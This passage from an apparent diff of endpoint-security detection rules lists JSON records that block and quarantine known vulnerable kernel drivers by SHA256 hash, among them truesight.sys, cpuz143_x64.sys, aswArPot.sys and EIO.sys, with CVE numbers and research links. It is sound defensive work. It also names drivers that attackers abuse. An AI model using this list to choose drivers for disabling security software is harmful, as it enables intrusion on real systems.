"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828095Z", + "creation_date": "2026-03-23T11:45:31.828097Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828102Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8dfb0deecf8d39956ecff812406e2e079802f2a2c6e853003c6d1aeed3ffbd7d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31d07748-4b95-5d89-b86b-33b7c128d5bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824385Z", + "creation_date": "2026-03-23T11:45:30.824388Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824393Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3629ce7fbcc691e1cf0c5e5f0bf5d964820107d7b860959b57afd17a712434c9", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31d9e85e-6d25-50f1-a101-a21a59a090f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615308Z", + "creation_date": "2026-03-23T11:45:29.615309Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615315Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "051dad67cc6cb6b6e20b1230b04c09cc360d106a6b7000e0991381356ace0811", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31da887a-c015-5827-bc0d-6d5cbbfd2ba7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.473388Z", + "creation_date": "2026-03-23T11:45:31.473391Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473400Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "409704c58dbfcf148730855ed3e5a179da5a9d7b5669391716d5b18996bed5d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31de84e3-4855-5380-b1f1-6e5c2a3cba17", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828565Z", + "creation_date": "2026-03-23T11:45:31.828567Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828572Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "548780fd48a92c2fbf94f5d8447c4d76899f9ac0fe3b2fd4b8b427635447e085", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31f38467-db65-58a0-a9de-080846169752", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815858Z", + "creation_date": "2026-03-23T11:45:30.815860Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815866Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f36bc2327a34da59c59e3fd4cb920a26f2db1c6a5f8eb17b00dc6e2a4ff71dc", + "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "31faf7e5-7661-549b-9526-f2d749b2a9b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825059Z", + "creation_date": "2026-03-23T11:45:31.825061Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825066Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c579a5786dae365555d6ef083910fbfc463926e52e9f3ae7ae028d615e6cffb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "320ae59a-5b1b-57a4-a353-cd7b7fa189ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498739Z", + "creation_date": "2026-03-23T11:45:31.498743Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498749Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da969d5b6b470c7758b28c8db88d17d56d837807119b45d66c088d5698189cf4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "320b5d99-f3e9-5e6a-869f-fe887bd7421f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811098Z", + "creation_date": "2026-03-23T11:45:31.811100Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811106Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37744ed595d1f5c5f28e0745adabc10a93e47ca64b906dacc4be078424916eb5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "320f5bb5-1c8d-5771-907a-3e2aab4315fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978440Z", + "creation_date": "2026-03-23T11:45:29.978442Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978448Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9661dd0dcf81d2ee8e5eb3b728c907b4eb861806971051ad772f7fe4d09eb6a", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3224ad16-d7c4-5b12-84a3-3fe1c2d242b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814313Z", + "creation_date": "2026-03-23T11:45:31.814316Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814324Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f42044d54e2820ce7866db56f42a45635da0fc54c9456db9cbbafb308c7f9bf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "323d34f1-9f87-55ab-9322-36298805c89b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610917Z", + "creation_date": "2026-03-23T11:45:29.610919Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610924Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "472e29b63e1d9d44269a99962b186113586fbd3603eac3a23c520c7ef73a69cf", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3244793e-fe60-5259-9a8a-09e9eef04ad7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977150Z", + "creation_date": "2026-03-23T11:45:29.977153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977161Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1fac3fab8ea2137a7e81a26de121187bf72e7d16ffa3e9aec3886e2376d3c718", + "comment": "ASUS vulnerable VGA Kernel 
Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3257f270-aab5-5d7f-8cd8-11748d7451ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154390Z", + "creation_date": "2026-03-23T11:45:31.154393Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154402Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1c5f026c62d6cd2eaf8c51a73a095ed616f3e6f81ff9c638b64605ffa06aa0a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32583d84-bde4-55de-9e6d-63bad41c5f3e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969041Z", + 
"creation_date": "2026-03-23T11:45:29.969043Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2e79f1e696f27fa70d72f97e448081b1fa14d59cbb89bb4a40428534dd5c6f6", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "325848d9-4087-510c-8c6f-11a0015460e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141433Z", + "creation_date": "2026-03-23T11:45:31.141435Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141441Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f169884ed8138fc954cf5d098c146e1bffa89c6c2914cf3c4802ed8ccb4cc5b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"325ab51a-1c0d-55ff-a8d7-fc45d2b5ed82", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830313Z", + "creation_date": "2026-03-23T11:45:30.830315Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830321Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d110cbdb130768e322689a1c9c54b74663d9358305ccb3760a4d27bf9b145c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "325f410f-54ff-584d-bd11-b75a7a1a1bc5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984087Z", + "creation_date": "2026-03-23T11:45:29.984089Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.984095Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9994990c02c37472625cc7b2255044feef9b73c08ca3a70c06861b7d26b27a25", + "comment": "Vulnerable Kernel Driver (aka VProEventMonitor.sys) [https://www.loldrivers.io/drivers/4db827b1-325b-444d-9f23-171285a4d12f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3265ec66-f8aa-5c11-a7f8-c0f7ade87bed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143510Z", + "creation_date": "2026-03-23T11:45:31.143512Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143518Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "648244095ea6a94a53be19cbf539948ef067ff38a99234f309b2f71a4ebcb630", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "326a8b14-0d61-5507-bd91-1aa17b33a16c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490280Z", + "creation_date": "2026-03-23T11:45:31.490282Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490287Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f37a48bf6871ed1e58b818be7506e2e05bb403a7dbcde6c785d31bad3c6cf056", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "326edf91-0bab-5535-aaf2-b96e85ca99d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154484Z", + "creation_date": "2026-03-23T11:45:31.154486Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154491Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "d29f601fec6ac5fc0ff035113f4b8b1863f34ff60e3f0f2731c515fc0efa36eb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "326fe57f-d0c0-5dba-9725-1e342912ffc9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824762Z", + "creation_date": "2026-03-23T11:45:31.824764Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824769Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d175169e3fcebe92b1c6b560d0c160ffe0fa6a826f3a5042b9b2ab140f6aed8b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32700161-2505-5d17-9f7c-8026563eecf1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146761Z", + "creation_date": "2026-03-23T11:45:31.146762Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146768Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23be2c7ad6e444bbf9c273380d3646ac62a684d37370f378c56ce9ddb9646d2e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32707a4f-1fc3-542f-b935-dc1aff83457d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825341Z", + "creation_date": "2026-03-23T11:45:30.825345Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825352Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "689f565e874b6d0232bbd946bb3c1e373d634512d1afa0b9ab90d45e507c85ac", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "32825e6b-b9b8-5864-9882-c5f98a7f0eeb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978977Z", + "creation_date": "2026-03-23T11:45:29.978979Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978984Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 